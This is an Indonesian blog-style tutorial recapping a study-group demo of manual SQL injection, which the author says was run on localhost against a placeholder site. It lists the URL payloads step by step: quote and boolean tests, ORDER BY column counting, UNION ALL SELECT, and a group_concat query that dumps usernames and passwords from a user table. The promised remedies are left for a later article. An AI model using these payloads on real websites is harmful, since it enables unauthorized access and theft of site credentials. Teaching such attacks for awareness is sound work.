Pada pertemuan yang lalu (11/01/2009), diadakan materi dadakan dari salah seorang peserta yang berkisar tentang keamanan sebuah website
dengan tujuan agar Web admin dan web master sadar akan adanya celah kemananan ini yang sedemikian populernya di kalangan masyarakat IT (Hacker/Cracker pada umumnya)

Tutor menggunakan Localhost dengan maksud agar tidak memberi contoh untuk merusak hasil karya/website orang lain

Structured Query Language (SQL) adalah sebuah bahasa yang dipergunakan untuk mengakses data dalam basis data relasional (wikipedia)
bagai dua sisi pedang, SQL memang berguna juga dapat mencelakakan.
SQL injection, dengan cara menginjeksikan sebaris bahasa SQL ke sebuah website
maka informasi yang seharusnya tidak di tampilkan akan tampil di halaman website

contohnya pada kasus ini :

 

sebuah web site sebut saja www.target.com (localhost) akan di test celah keamanannya dengan menggunakan
SQL injection

 

http://www.target.com/index.php?pageID=1

1. Letakkan karakter Single Quote pada akhri url address bar.
http://www.target.com/index.php?pageID=1' <== karakter diletakkan di belakang url address bar.
jika halaman tersebut error berarti ada kemungkinan dapat di inject

2. gunakan Oprator Logika (AND atau OR) untuk memastikan
http://www.target.com/index.php?pageID=1 AND 1=1 <== True,
artinya jika kita meletakkan operator logika tersebut maka tidak terjadi error alias page berjalan dengan normal.

http://www.target.com/index.php?pageID=1 and 1=2 <== False,
artinya jika kita meletakkan operator logika tersebut maka terjadi error alias page tidak berjalan dengan normal.

jika itu terjadi maka sekarang kita harus mencari berapa kolom yang ada pada tabel
kita harus mencarinya satu persatu

- http://www.target.com/index.php?pageID=1+order+by+1/* <== True
maka jumlah kolom bukan lah 1 kita cari lagi

- http://www.target.com/index.php?pageID=1+order+by+2/* <== True
maka jumlah kolom bukan lah 2 kita cari lagi

- http://www.target.com/index.php?pageID=1+order+by+3/* <== True
- http://www.target.com/index.php?pageID=1+order+by+4/* <== True
- http://www.target.com/index.php?pageID=1+order+by+5/* <== False

misalkan pada angka kelima muncul error “Unknown Colomn ‘5',
maka dapat disimpulkan bahwa tabel memiliki 4 kolom.

Untuk mengecek di kolom berapa terdapat hole atau kolom yang bermasalah kita bisa gunakan stament
UNION ALL SELECTatau UNION SELECT  ,dll.

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,2,3,4/*

maka di browser akan tampil No antara 1 sampai 4
misalkan yang muncul 2 dan 4

pada bagian ini bisa di bilang kita akan bermain tebak tebakan (BLIND SQL injection)
misalkan tebakan kita benar user memiliki kolom (username dan password).
maka di input ke dalam address

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,username,3,...

kalau cuma satu angka yang terbaca contohnya '2'
secara bersamaaan

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,group_concat(username,0×3a,password),3,4+from+user/*

maka pada browser akan tertera Username pada angka 2 dan Password pada angka 4
dan Hacker/Cracker dapat menggunakan Account tersebut untuk menguasai isi Web

mengapa Hal ini dapat terjadi...??
Bagaimana penanganannya..??

tunggu artikel selanjutnya....??